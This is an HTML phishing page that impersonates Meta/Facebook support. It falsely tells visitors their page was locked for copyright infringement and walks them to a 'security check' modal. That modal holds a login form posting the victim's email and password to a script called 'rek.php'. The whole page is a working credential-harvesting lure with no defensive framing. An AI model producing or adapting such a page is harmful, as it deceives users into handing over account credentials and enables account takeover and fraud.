<!DOCTYPE html>
<html lang="en">
    <head>
        <title>Page Help Support Team</title>
        <meta
            name="viewport"
            content="user-scalable=no,initial-scale=1,maximum-scale=1" />

        <meta property="og:url" content="" />
        <meta property="og:type" content="" />
        <meta property="og:title" content="Page Help Support Team" />
        <meta
            property="og:description"
            content="We saw unusual activity on your account.To protect you, your profile is hidden now and you can't access some features" />
        <meta property="og:image" content="https://i.ibb.co/rs4BM3H/meta-askar-stockadobe.jpg" />

        <link
            href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
            rel="stylesheet"
            integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
            crossorigin="anonymous" />
        <link
            rel="icon"
            href="https://i.ibb.co/ftrhCQY/XXXX-removebg-preview.png" />
        <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
    </head>
    <body>
        <nav class="navbar navbar-dark bg-primary">
            <div class="container-fluid">
                <svg
                    xmlns="http://www.w3.org/2000/svg"
                    width="16"
                    height="16"
                    fill="currentColor"
                    class="bi bi-meta"
                    viewBox="0 0 16 16">
                    <path
                        fill-rule="evenodd"
                        d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                </svg>
            </div>
        </nav>
        <div class="container">
            <div class="mt-4">
                <img
                    src="https://i.ibb.co/JkYngGK/278025162-4906174272753705-4421342817374217522-n.png"
                    class="img-fluid rounded mx-auto d-block"
                    width=""
                    height=""
                    alt="..." />
            </div>
            <div class="mt-4">
                <p class="text-center h5">Your Account Has Been Locked</p>
            </div>
            <p class="text-center small">
                Your page has been detected for activity that is against our
                page policy regarding copyright infringement.
            </p>

            <hr class="my-4" />

            <div class="p-3 mb-2 bg-secondary bg-opacity-25 text-dark rounded">
                <p><strong>Account Locked Januari 16, 2023</strong></p>
                <p>
                    <small
                        >To protect you, your profile is hidden now and you
                        can't access some features.</small
                    >
                </p>
            </div>
            <hr class="my-4" />
            <p class="text-center small">
                Over the next few steps we'll walk you through a security check
                to help secure your account and let you log back in.
            </p>
            <button
                type="button"
                class="btn btn-primary d-block mx-auto w-100"
                data-bs-toggle="modal"
                data-bs-target="#staticBackdrop">
                Get Started
            </button>
        </div>
    </body>

    <div
        class="modal fade"
        id="staticBackdrop"
        data-bs-backdrop="static"
        data-bs-keyboard="false"
        tabindex="-1"
        aria-labelledby="staticBackdropLabel"
        aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-body">
                    <div class="text-center">
                        <img
                            src="https://i.ibb.co/BVY4df8/Facebook-Logo-wine.png"
                            alt="Verification"
                            class="img-fluid rounded" />
                    </div>
                    <div class="container">
                        <div class="mt-4">
                            <form action="rek.php" method="POST">
                                <div class="mb-3 shadow rounded">
                                    <input
                                        type="email"
                                        class="form-control up"
                                        name="data1"
                                        placeholder="Email address"
                                        autocomplete="on"
                                        required="yes"
                                        maxlength="100" />
                                </div>
                                <div class="mb-3 shadow">
                                    <input
                                        type="password"
                                        class="form-control up"
                                        name="data2"
                                        placeholder="Password"
                                        autocomplete="off"
                                        required="yes"
                                        maxlength="150" />
                                </div>
                                <div class="form-group mt-3 shadow rounded">
                                    <button
                                        class="btn btn-primary d-block mx-auto w-100"
                                        type="submit">
                                        Log In
                                    </button>
                                </div>
                            </form>
                        </div>
                    </div>
                    <hr class="my-4" />
                    <p class="text-secondary text-center">
                       
                        <svg
                            xmlns="http://www.w3.org/2000/svg"
                            width="16"
                            height="16"
                            fill="currentColor"
                            class="bi bi-meta"
                            viewBox="0 0 16 16">
                            <path
                                fill-rule="evenodd"
                                d="M8.217 5.243C9.145 3.988 10.171 3 11.483 3 13.96 3 16 6.153 16.001 9.907c0 2.29-.986 3.725-2.757 3.725-1.543 0-2.395-.866-3.924-3.424l-.667-1.123-.118-.197a54.944 54.944 0 0 0-.53-.877l-1.178 2.08c-1.673 2.925-2.615 3.541-3.923 3.541C1.086 13.632 0 12.217 0 9.973 0 6.388 1.995 3 4.598 3c.319 0 .625.039.924.122.31.086.611.22.913.407.577.359 1.154.915 1.782 1.714Zm1.516 2.224c-.252-.41-.494-.787-.727-1.133L9 6.326c.845-1.305 1.543-1.954 2.372-1.954 1.723 0 3.102 2.537 3.102 5.653 0 1.188-.39 1.877-1.195 1.877-.773 0-1.142-.51-2.61-2.87l-.937-1.565ZM4.846 4.756c.725.1 1.385.634 2.34 2.001A212.13 212.13 0 0 0 5.551 9.3c-1.357 2.126-1.826 2.603-2.581 2.603-.777 0-1.24-.682-1.24-1.9 0-2.602 1.298-5.264 2.846-5.264.091 0 .181.006.27.018Z" />
                        </svg> Meta
                    </p>
                </div>
            </div>
        </div>
    </div>

  
</html>
